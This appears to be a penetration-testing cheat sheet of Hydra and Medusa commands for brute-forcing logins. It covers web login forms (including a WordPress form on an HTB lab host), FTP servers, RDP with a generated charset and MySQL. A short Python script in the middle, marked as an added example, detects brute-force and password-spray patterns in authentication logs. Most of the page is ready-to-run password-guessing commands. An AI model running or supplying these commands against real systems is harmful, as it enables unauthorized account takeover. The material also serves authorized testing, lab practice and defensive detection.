# login-form-brute-force

## HTTP-Post-form

```
hydra -l admin -P /path/to/password_list.txt server.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
```

OR

```
hydra -L /usr/share/seclists/Usernames/cirt-default-usernames.txt -p admin@123 "http-post-form://blog.bigbang.htb/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&testcookie=1:F=not registered on this site"
```
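The two commands above leave different traces in an authentication log: the first tries many passwords against one account, the second tries one password across many usernames. As an added example (not part of the original page), this detector classifies source IPs by those two patterns; the log line format, the window and threshold defaults, and all function names are assumptions, and the sample lines are constructed.

```python
import re
from datetime import datetime

# Hypothetical auth-log format: <ISO-8601 UTC> login_failed|login_ok ip=<src> user=<name>
LINE_RE = re.compile(r"^(\S+) login_(failed|ok) ip=(\S+) user=(\S+)$")

# Constructed sample lines; addresses are from the RFC 5737 documentation ranges.
SAMPLE = (
    [f"2025-01-01T10:00:{s:02d}Z login_failed ip=203.0.113.7 user=admin"
     for s in range(0, 12, 2)]                      # one account, six failures
    + [f"2025-01-01T10:05:{s:02d}Z login_failed ip=198.51.100.9 user=user{s}"
       for s in range(6)]                           # six accounts, one failure each
    + ["2025-01-01T10:07:00Z login_failed ip=192.0.2.4 user=alice",
       "2025-01-01T10:07:20Z login_ok ip=192.0.2.4 user=alice"]  # ordinary typo
)

def failed_logins(lines):
    """Yield (epoch_seconds, ip, user) for each failed-login line."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and m.group(2) == "failed":
            ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
            yield ts.timestamp(), m.group(3), m.group(4)

def classify(lines, window=60, threshold=5):
    """Map source IP -> verdict for IPs with >= threshold failures in any window-second span."""
    by_ip = {}
    for ts, ip, user in failed_logins(lines):
        by_ip.setdefault(ip, []).append((ts, user))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                          # slide the window forward
            burst = events[start:end + 1]
            if len(burst) >= threshold:
                users = {u for _, u in burst}
                # one account hit repeatedly vs. one attempt per account vs. a blend
                verdicts[ip] = ("brute-force" if len(users) == 1 else
                                "spray" if len(users) == len(burst) else "mixed")
                break
    return verdicts

if __name__ == "__main__":
    print(classify(SAMPLE))
```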

## Other services

```
hydra -l admin -P /path/to/password_list.txt ftp://server.com
```

## Brute force multiple FTP servers

```
hydra -L usernames.txt -P passwords.txt -s 2121 -M targets.txt ftp
```

## Advanced RDP brute-forcing

*You suspect the username is "administrator," and that the password consists of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers.*

```
hydra -l administrator -x 6:8:aA1 192.168.1.100 rdp
```

## Brute-force with medusa

**HTTP brute-force**

```
medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m "FORM:username=^USER^&password=^PASS^"
```

**Other services**

```
medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
```
